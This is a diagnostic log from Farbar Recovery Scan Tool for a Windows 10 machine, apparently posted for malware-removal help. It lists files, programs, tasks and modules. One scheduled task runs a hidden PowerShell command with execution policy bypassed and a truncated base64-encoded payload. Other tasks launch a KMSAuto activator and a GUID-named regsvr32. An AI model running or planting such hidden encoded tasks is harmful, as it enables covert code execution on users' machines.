2016-02-10 17:16 - 2016-01-27 15:31 - 00079360 _____ (Microsoft Corporation) C:\Windows\system32\cfgbkend.dll
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-03-09 15:04 - 2016-01-05 10:36 - 00000000 ____D C:\Users\kevin\AppData\Roaming\Spotify
2016-03-09 15:04 - 2016-01-05 10:36 - 00000000 ____D C:\Users\kevin\AppData\Local\Spotify
2016-03-09 15:03 - 2016-01-10 22:34 - 00000934 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-03-09 15:03 - 2015-12-29 21:24 - 00000000 ____D C:\ProgramData\Origin
2016-03-09 15:03 - 2015-12-29 20:51 - 00000000 ____D C:\Users\kevin\AppData\Roaming\uTorrent
2016-03-09 15:03 - 2015-10-30 18:21 - 00000000 ____D C:\Windows\INF
2016-03-09 15:01 - 2015-12-30 14:56 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-03-09 15:01 - 2015-12-30 14:55 - 00332240 _____ C:\Windows\system32\FNTCACHE.DAT
2016-03-09 15:01 - 2015-12-29 20:14 - 00000000 ____D C:\ProgramData\NVIDIA
2016-03-09 15:01 - 2015-10-30 18:24 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-03-09 15:01 - 2015-10-30 18:24 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-03-09 15:01 - 2015-10-30 18:24 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-03-09 15:01 - 2015-10-30 18:24 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-03-09 15:01 - 2015-10-30 17:28 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-03-09 15:00 - 2015-12-29 19:59 - 00000000 ____D C:\Users\kevin
2016-03-09 14:44 - 2016-01-10 22:34 - 00000938 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-03-09 14:40 - 2016-01-10 22:30 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-03-09 14:10 - 2015-12-29 20:18 - 00000000 ____D C:\Windows\system32\MRT
2016-03-09 14:07 - 2015-12-29 20:18 - 143659408 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-03-09 14:07 - 2015-10-30 18:11 - 00000000 ____D C:\Windows\CbsTemp
2016-03-09 12:23 - 2016-01-10 22:58 - 00000000 ____D C:\Users\kevin\AppData\Roaming\MPC-HC
2016-03-09 12:19 - 2015-12-29 19:59 - 00000000 ____D C:\Users\kevin\AppData\Local\VirtualStore
2016-03-09 11:40 - 2015-12-29 20:10 - 00834360 _____ C:\Windows\system32\PerfStringBackup.INI
2016-03-09 11:22 - 2016-01-01 13:59 - 00004168 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{E6C01D44-E7E2-4358-B7BB-CE29091035DA}
2016-03-08 16:54 - 2015-10-30 18:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-08 16:54 - 2015-10-30 18:24 - 00000000 ____D C:\Windows\AppReadiness
2016-03-08 16:49 - 2015-12-30 01:04 - 00226168 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2016-03-08 16:36 - 2015-12-30 01:04 - 00226168 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2016-03-08 16:33 - 2015-12-29 20:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2016-03-08 16:33 - 2015-12-29 20:14 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2016-03-08 16:32 - 2015-12-29 20:11 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2016-03-04 19:21 - 2015-07-13 20:45 - 12654024 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2016-03-04 17:50 - 2015-10-30 18:24 - 00000000 ____D C:\Windows\rescache
2016-03-03 23:16 - 2015-12-29 20:19 - 01903344 _____ (NVIDIA Corporation) C:\Windows\system32\nvspcap64.dll
2016-03-03 23:16 - 2015-12-29 20:19 - 01756424 _____ (NVIDIA Corporation) C:\Windows\system32\nvspbridge64.dll
2016-03-03 23:16 - 2015-12-29 20:19 - 01571624 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspcap.dll
2016-03-03 23:16 - 2015-12-29 20:19 - 01316184 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspbridge.dll
2016-03-03 23:16 - 2015-12-29 20:19 - 00112216 _____ C:\Windows\system32\NvRtmpStreamer64.dll
2016-03-03 23:16 - 2015-12-29 20:19 - 00047760 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2016-03-03 23:16 - 2015-07-13 20:45 - 20061344 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2016-03-03 23:16 - 2015-07-13 20:45 - 17320280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2016-03-03 23:16 - 2015-07-13 20:45 - 14226672 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2016-03-03 23:16 - 2015-07-13 20:45 - 03681488 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2016-03-03 23:16 - 2015-07-13 20:45 - 03259360 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2016-03-03 23:16 - 2015-07-13 20:45 - 00037702 _____ C:\Windows\system32\nvinfo.pb
2016-03-03 20:54 - 2016-01-01 14:24 - 00532536 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2016-03-03 20:54 - 2016-01-01 14:24 - 00083512 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2016-03-03 20:54 - 2015-12-29 20:14 - 06371384 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2016-03-03 20:54 - 2015-12-29 20:14 - 06200675 _____ C:\Windows\system32\nvcoproc.bin
2016-03-03 20:54 - 2015-12-29 20:14 - 02992576 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2016-03-03 20:54 - 2015-12-29 20:14 - 02561472 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2016-03-03 20:54 - 2015-12-29 20:14 - 01265720 _____ (NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe
2016-03-03 20:54 - 2015-12-29 20:14 - 00392128 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2016-03-03 20:54 - 2015-12-29 20:14 - 00069568 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2016-03-03 16:48 - 2015-12-29 19:59 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-03-02 23:04 - 2015-10-30 20:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-02 23:04 - 2015-10-30 18:24 - 00000000 __RSD C:\Windows\Media
2016-03-02 23:04 - 2015-10-30 18:24 - 00000000 ___RD C:\Windows\PurchaseDialog
2016-03-02 23:04 - 2015-10-30 18:24 - 00000000 ____D C:\Windows\system32\WinBioPlugIns
2016-03-02 23:04 - 2015-10-30 18:24 - 00000000 ____D C:\Windows\system32\SystemResetPlatform
2016-03-02 23:04 - 2015-10-30 18:24 - 00000000 ____D C:\Windows\system32\appraiser
2016-03-02 23:04 - 2015-10-30 18:24 - 00000000 ____D C:\Windows\bcastdvr
2016-03-02 23:04 - 2015-10-30 17:28 - 00000000 ____D C:\Windows\SysWOW64\Dism
2016-03-02 23:04 - 2015-10-30 17:28 - 00000000 ____D C:\Windows\system32\Dism
2016-03-02 22:43 - 2016-01-01 14:27 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-03-02 12:03 - 2015-10-30 18:24 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-03-01 17:19 - 2015-12-29 19:59 - 00000000 ____D C:\Users\kevin\AppData\Local\Packages
2016-03-01 12:56 - 2015-10-30 18:24 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-02-24 19:50 - 2015-12-29 20:19 - 00000000 ____D C:\ProgramData\Package Cache
2016-02-23 23:51 - 2015-10-30 18:24 - 00000000 ___HD C:\Windows\ELAMBKUP
2016-02-23 23:43 - 2016-01-10 22:52 - 00000215 _____ C:\Prefs.js
2016-02-23 23:43 - 2016-01-10 22:52 - 00000000 ____D C:\searchplugins
2016-02-23 23:34 - 2015-10-30 18:24 - 00000000 ____D C:\Windows\LiveKernelReports
2016-02-23 23:18 - 2016-01-16 20:23 - 00000000 ____D C:\Users\kevin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Xiaomi
2016-02-21 15:45 - 2016-01-10 22:34 - 00002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-21 15:45 - 2016-01-10 22:34 - 00002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-02-17 20:21 - 2015-12-30 18:17 - 00000000 ____D C:\Users\kevin\AppData\Local\CrashDumps
2016-02-15 18:13 - 2015-12-29 21:09 - 00000000 ____D C:\Users\kevin\AppData\Local\IPVanish
2016-02-15 18:13 - 2015-12-29 21:09 - 00000000 ____D C:\Program Files (x86)\IPVanish
2016-02-11 17:55 - 2015-12-29 20:01 - 00002367 _____ C:\Users\kevin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-02-11 17:55 - 2015-12-29 20:01 - 00000000 ___RD C:\Users\kevin\OneDrive
 
==================== Files in the root of some directories =======
 
2016-02-17 20:15 - 2016-02-17 02:25 - 0000001 _____ () C:\Users\kevin\AppData\Roaming\write 1234
2016-01-01 14:28 - 2016-01-01 14:28 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
 
Some files in TEMP:
====================
C:\Users\kevin\AppData\Local\Temp\avgnt.exe
C:\Users\kevin\AppData\Local\Temp\nvStInst.exe
C:\Users\kevin\AppData\Local\Temp\sfamcc00001.dll
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-03-01 12:16
 
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by kevin (2016-03-09 15:06:28)
Running from C:\
Windows 10 Pro Version 1511 (X64) (2015-12-29 08:57:51)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-3312796164-3718684029-3865147747-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3312796164-3718684029-3865147747-503 - Limited - Disabled)
Guest (S-1-5-21-3312796164-3718684029-3865147747-501 - Limited - Disabled)
kevin (S-1-5-21-3312796164-3718684029-3865147747-1001 - Administrator - Enabled) => C:\Users\kevin
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avira Antivirus (Disabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Disabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\uTorrent) (Version: 3.4.5.41865 - BitTorrent Inc.)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.2.172 - Adobe Systems, Inc.)
Apple Application Support (32-bit) (HKLM-x32\...\{7FA9ECCF-A2DE-4DA1-BFF3-81260DBDA68F}) (Version: 4.1.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{691F30EB-9009-475A-B8A9-E1BF39598FD5}) (Version: 4.1.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.15.141 - Avira Operations GmbH & Co. KG)
Avira Launcher (HKLM-x32\...\{3b87484e-d70b-4b4f-ad59-2ae89571e2cf}) (Version: 1.1.56.9119 - Avira Operations GmbH & Co. KG)
Avira Launcher (x32 Version: 1.1.56.9119 - Avira Operations GmbH & Co. KG) Hidden
Avira Scout (HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\{3cc6cc67-d693-4af9-9320-241d34083394}) (Version: 16.2.15.170 - Avira Operations GmbH & Co. KG)
AviraScoutMsi (x32 Version: 16.02.15.00170 - Avira Operations GmbH & Co. KG) Hidden
Battlefield 4™ (HKLM-x32\...\{ABADE36E-EC37-413B-8179-B432AD3FACE7}) (Version: 1.7.2.45672 - Electronic Arts)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.3.0 - EA Digital Illusions CE AB)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.13 - Piriform)
Corsair Hydro Series 7289 USB Device (Driver Removal) (HKLM-x32\...\HYDROS7289&1B1C&0C02) (Version:  - Corsair Components, Inc.)
Corsair Link™ USB Dongle (Driver Removal) (HKLM-x32\...\SIUSBXP&1B1C&1C00) (Version:  - Corsair Memory, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HL-1210W series (HKLM-x32\...\{75E38F04-1BAF-4054-A059-57F831688943}) (Version: 1.0.2.0 - Brother Industries, Ltd.)
Intel® Chipset Device Software (x32 Version: 10.1.1.8 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1156 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
IPVanish (x32 Version: 2.0.5774.32119 - IPVanish.com) Hidden
IPVanish VPN (HKLM-x32\...\{9dd91e59-7b95-4634-bb48-2741f1460ecf}) (Version: 2.0.5774.32119 - IPVanish.com)
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 16.0.6568.2025 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Mozilla Firefox 43.0.4 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 43.0.4 (x86 en-US)) (Version: 43.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.4.5848 - Mozilla)
NVIDIA 3D Vision Controller Driver 364.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 364.44 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 364.47 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 364.47 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.10.2.40 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.10.2.40 - NVIDIA Corporation)
NVIDIA Graphics Driver 364.47 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 364.47 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.4 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.6528.1011 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.6528.1011 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.6528.1011 - Microsoft Corporation) Hidden
Origin (HKLM-x32\...\Origin) (Version: 9.10.1.1501 - Electronic Arts, Inc.)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.993 - Even Balance, Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7560 - Realtek Semiconductor Corp.)
SHIELD Streaming (Version: 5.1.0270 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.10.2.40 - NVIDIA Corporation) Hidden
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version:  - )
Spotify (HKU\S-1-5-21-3312796164-3718684029-3865147747-1001\...\Spotify) (Version: 1.0.24.104.g92a22684 - Spotify AB)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-3312796164-3718684029-3865147747-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\kevin\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\FileCoAuth.exe (Microsoft Corporation)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0924AE62-8C02-4CB1-8D4D-EC7748C6A2AD} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-02-04] (Microsoft Corporation)
Task: {44C58977-4DAD-42D5-B575-A286BC854E63} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2015-12-23] ()
Task: {4DB00FF7-AF9C-4A54-885E-3566BBF95577} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-27] (Adobe Systems Incorporated)
Task: {6DFFC430-6EA3-449C-BCA5-63BF16DAB159} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2016-02-06] (Microsoft Corporation)
Task: {73149628-456D-4963-88EA-F756CF4EB817} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-10] (Google Inc.)
Task: {7C5AAB22-2E32-4952-98EB-EEF8F2937C02} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-12-09] (Piriform Ltd)
Task: {83113278-EA75-49B1-90C0-E877FB8916B4} - System32\Tasks\{8D2053D8-20E4-3EA4-F40B-3B75A24CA541} => C:\Windows\system32\regsvr32.exe [2015-10-30] (Microsoft Corporation)
Task: {93831AC8-68A2-456B-8664-989A0650A7CB} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-03-09] (Microsoft Corporation)
Task: {AD59ADD5-2628-4698-B950-6DB035C2375E} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe [2016-03-01] (MSFree Inc.)
Task: {B3EE4E80-0097-4C92-BAA0-7D6257F67F15} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-02-04] (Microsoft Corporation)
Task: {B4A50DFE-42DB-4B8F-9926-236255622939} - System32\Tasks\{0F790B47-0F78-7F78-0D11-0809780B1108} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9480 more characters).
Task: {BA0ADDCE-A0D1-4BCC-A8DE-C2D2DE3331F0} - System32\Tasks\Start Corsair Link => C:\Program Files (x86)\Corsair\Corsair Link\CorsairLINK.exe
Task: {F03F0A17-F72D-4BBE-B060-D538A82CD88D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2016-02-06] (Microsoft Corporation)
Task: {F05682AA-517D-41EF-8FBA-A777F84ED3F5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-01-10] (Google Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-10-30 18:18 - 2015-10-30 18:18 - 00185856 _____ () C:\Windows\SYSTEM32\ism32k.dll
2015-12-29 20:14 - 2016-03-03 20:54 - 00133056 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-03-01 12:56 - 2016-02-04 05:51 - 00173256 _____ () C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll
2016-03-08 16:33 - 2016-03-03 23:16 - 01416064 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll
2015-12-29 20:19 - 2016-03-03 23:16 - 00299392 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2016-03-08 16:33 - 2016-03-03 23:16 - 03613056 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll
2016-01-01 14:53 - 2016-01-01 14:53 - 00076152 _____ () C:\Windows\system32\PnkBstrA.exe
2016-03-02 13:25 - 2016-02-23 22:27 - 02654872 _____ () C:\Windows\system32\CoreUIComponents.dll
2016-01-23 15:26 - 2016-01-23 15:31 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-03-02 13:25 - 2016-02-23 22:27 - 02654872 _____ () C:\Windows\System32\CoreUIComponents.dll
2016-03-02 12:01 - 2016-02-05 00:53 - 08914120 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2015-12-29 20:09 - 2015-12-07 15:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-03-02 13:25 - 2016-02-23 19:36 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-03-02 13:25 - 2016-02-23 19:38 - 00674816 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\MtcUvc.dll
2016-01-13 17:28 - 2016-01-05 12:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-13 17:28 - 2016-01-05 12:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-28 12:47 - 2016-01-16 16:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-28 12:47 - 2016-01-16 16:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-06-01 21:00 - 2015-06-01 21:00 - 00102912 _____ () C:\Windows\System32\IccLibDll_x64.dll
2016-01-23 15:26 - 2016-01-23 15:31 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-01-23 15:26 - 2016-01-23 15:31 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2015-12-29 20:19 - 2016-03-03 23:16 - 00020352 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2015-12-29 21:27 - 2016-02-02 20:59 - 01016832 _____ () C:\Program Files (x86)\Origin\platforms\qwindows.dll
2015-12-29 21:27 - 2016-02-02 20:58 - 00028160 _____ () C:\Program Files (x86)\Origin\imageformats\qgif.dll
2015-12-29 21:27 - 2016-02-02 20:58 - 00029696 _____ () C:\Program Files (x86)\Origin\imageformats\qico.dll
2015-12-29 21:27 - 2016-02-02 20:58 - 00256000 _____ () C:\Program Files (x86)\Origin\imageformats\qjpeg.dll
2015-12-29 21:27 - 2016-02-02 20:58 - 00266240 _____ () C:\Program Files (x86)\Origin\imageformats\qmng.dll
2015-12-29 21:27 - 2016-02-02 20:58 - 00023552 _____ () C:\Program Files (x86)\Origin\imageformats\qtga.dll
2015-12-29 21:27 - 2016-02-02 20:58 - 00346112 _____ () C:\Program Files (x86)\Origin\imageformats\qtiff.dll
2015-12-29 21:27 - 2016-02-02 20:58 - 00023552 _____ () C:\Program Files (x86)\Origin\imageformats\qwbmp.dll
2015-12-29 21:27 - 2016-02-02 20:59 - 00243200 _____ () C:\Program Files (x86)\Origin\mediaservice\wmfengine.dll
2016-03-02 22:43 - 2009-02-27 16:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2016-02-21 15:44 - 2016-02-18 15:14 - 01630360 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libglesv2.dll
2016-02-21 15:44 - 2016-02-18 15:14 - 00085656 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libegl.dll
2016-02-21 15:44 - 2016-02-18 15:15 - 16808600 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
